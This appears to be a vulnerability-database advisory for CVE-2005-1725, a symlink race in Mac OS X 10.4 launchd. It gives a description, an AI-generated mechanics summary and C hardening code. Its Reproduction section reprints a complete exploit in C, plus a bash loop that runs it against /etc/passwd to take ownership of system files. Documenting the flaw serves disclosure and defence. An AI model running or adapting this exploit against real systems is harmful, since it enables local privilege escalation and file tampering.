VYPR
Unrated severity · NVD Advisory · Published Jun 8, 2005 · Updated Apr 16, 2026

CVE-2005-1725


Description

launchd 106 in Apple Mac OS X 10.4.x up to 10.4.1 allows local users to overwrite arbitrary files via a symlink attack on the socket file in an insecure temporary directory.

AI Insight

LLM-synthesized narrative grounded in this CVE's description and references.

Affected products

3
  • cpe:2.3:o:apple:mac_os_x_server:10.4:*:*:*:*:*:*:*
  • cpe:2.3:o:apple:mac_os_x_server:10.4.1:*:*:*:*:*:*:*
  • Range: 10.4.x up to 10.4.1

Vulnerability mechanics

Root cause

"launchd creates a socket file in an insecure temporary directory, allowing a local attacker to overwrite arbitrary files via a symlink attack."

Attack vector

A local attacker can exploit this vulnerability by creating a symbolic link to a target file in a temporary directory that launchd uses. The exploit code then races with launchd to replace the socket file with the symbolic link. When launchd attempts to use the socket, it will instead operate on the target file specified by the symbolic link, leading to arbitrary file overwrite [ref_id=1].

Affected code

The vulnerability lies within the launchd process in Apple Mac OS X 10.4.x up to 10.4.1. Specifically, the exploit targets the creation and use of a socket file located in `/var/launchd/` which is susceptible to symbolic link attacks due to its placement in a temporary directory [ref_id=1].

What the fix does

The advisory does not provide specific details about a patch or fix. However, the vulnerability is described as a race condition involving a socket file in a temporary directory. A proper fix would involve ensuring that temporary directories are created with secure permissions or that the socket file is created in a way that prevents symbolic link attacks.
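The hardening pattern described above, as an added example (it is not Apple's fix and not code from the advisory): create the socket's directory privately, verify it through a file descriptor instead of by path, and bind with a relative name. The function names `open_private_dir` and `bind_private_socket` are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/un.h>
#include <unistd.h>

/* Return an fd for `dir` (created 0700 if absent) only when it is a real
 * directory owned by us with no group/other access; otherwise -1. */
int open_private_dir(const char *dir)
{
    struct stat st;
    if (mkdir(dir, 0700) != 0 && errno != EEXIST)
        return -1;
    /* O_NOFOLLOW makes open() fail if a symlink was planted at `dir`. */
    int fd = open(dir, O_RDONLY | O_DIRECTORY | O_NOFOLLOW);
    if (fd >= 0 && fstat(fd, &st) == 0 && st.st_uid == geteuid() &&
        (st.st_mode & 077) == 0)
        return fd;
    if (fd >= 0)
        close(fd);
    return -1;
}

/* Bind a listening socket in the vetted dir; note: chdir()s into `dir`. */
int bind_private_socket(const char *dir, const char *name)
{
    struct sockaddr_un sa = { .sun_family = AF_UNIX };
    int s = -1, dfd = open_private_dir(dir);
    if (dfd < 0 || strchr(name, '/') || strlen(name) >= sizeof(sa.sun_path))
        goto fail;
    /* Enter via the checked fd: the bind path is relative, not re-resolved. */
    if (fchdir(dfd) != 0)
        goto fail;
    strcpy(sa.sun_path, name);
    /* bind() fails if anything, even a symlink, already has that name. */
    if ((s = socket(AF_UNIX, SOCK_STREAM, 0)) < 0 ||
        bind(s, (struct sockaddr *)&sa, sizeof(sa)) != 0 || listen(s, 8) != 0)
        goto fail;
    close(dfd);
    return s;
fail:
    if (s >= 0) close(s);
    if (dfd >= 0) close(dfd);
    return -1;
}
```

Any later permission or ownership change should go through a descriptor (`fchmod`, `fchown`) for the same reason: a path-based call follows whatever is at that name at the moment of the call.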

Preconditions

  • auth: The attacker must have local access to the affected system.
  • input: The attacker needs to be able to create files and symbolic links in a temporary directory.

Reproduction

# Apple Mac OSX 10.4 - launchd Race Condition Exploit

## Exploit

```c
/*
 * Mac OS X 10.4 launchd race condition exploit
 *
 * intropy (intropy <at> caughq.org)
 */

/* .sh script to help with the offsets /str0ke
#!/bin/bash

X=1000
Y=3000
I=1

while ((1))
do
  ./CAU-launchd /etc/passwd $X
  if [ $I -lt 30 ]
  then
    ((X=$X+$Y))
    ((I=$I+1))
  else
    X=1000
    I=1
  fi
done
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>

#define DEBUG 0
#define SLEEP 6000

main(int argc, char *argv[])
{
    pid_t pid;
    int count, sleep = SLEEP;
    char name[100];
    char target[100];
    struct stat *stats = (struct stat *)malloc(sizeof(struct stat));

    if ( argc < 2) {
        fprintf(stderr, "%s <file to 0wn>\n", argv[0]);
        exit(-1);
    } else if ( argc > 2 ) {
        sleep = atoi(argv[2]);
        strncpy(target, argv[1], sizeof(target)-1);
    } else {
        strncpy(target, argv[1], sizeof(target)-1);
    }

    if ( DEBUG ) printf("Going for %s\n", target);
    if ( DEBUG ) printf("Using usleep %d\n", sleep);

    pid = fork();

    if ( pid == 0 ) {
        if ( DEBUG ) {
            system("/sbin/launchd -v /bin/ls -R /var/launchd/ 2>/dev/null");
        } else {
            system("/sbin/launchd -v /bin/ls -R /var/launchd/ >/dev/null 2>&1");
        }
    } else {
        snprintf(name, sizeof(name)-1, "/var/launchd/%d.%d/sock", getuid(), pid+2);
        if ( DEBUG ) printf("Checking %s\n", name);
        usleep(sleep);
        if ( DEBUG ) printf("Removing sock...\n");
        if ( (unlink(name)) != 0 ) {
            if ( DEBUG ) perror("unlink");
        } else {
            if ( (symlink(target, name)) != 0 ) {
                if ( DEBUG ) perror("symlink");
            } else {
                if ( DEBUG ) printf("Created symlink %s -> %s...\n", name, target);
            }
        }
        stat(target, stats);
        if ( stats->st_uid == getuid() ) {
            printf("Looks like we got it\n");
            usleep(10000000);
        }
    }
}

// milw0rm.com [2005-06-14]
```

## Script to help with offsets

```bash
#!/bin/bash

X=1000
Y=3000
I=1

while ((1))
do
  ./CAU-launchd /etc/passwd $X
  if [ $I -lt 30 ]
  then
    ((X=$X+$Y))
    ((I=$I+1))
  else
    X=1000
    I=1
  fi
done
```

Generated on Jun 2, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.

References

3
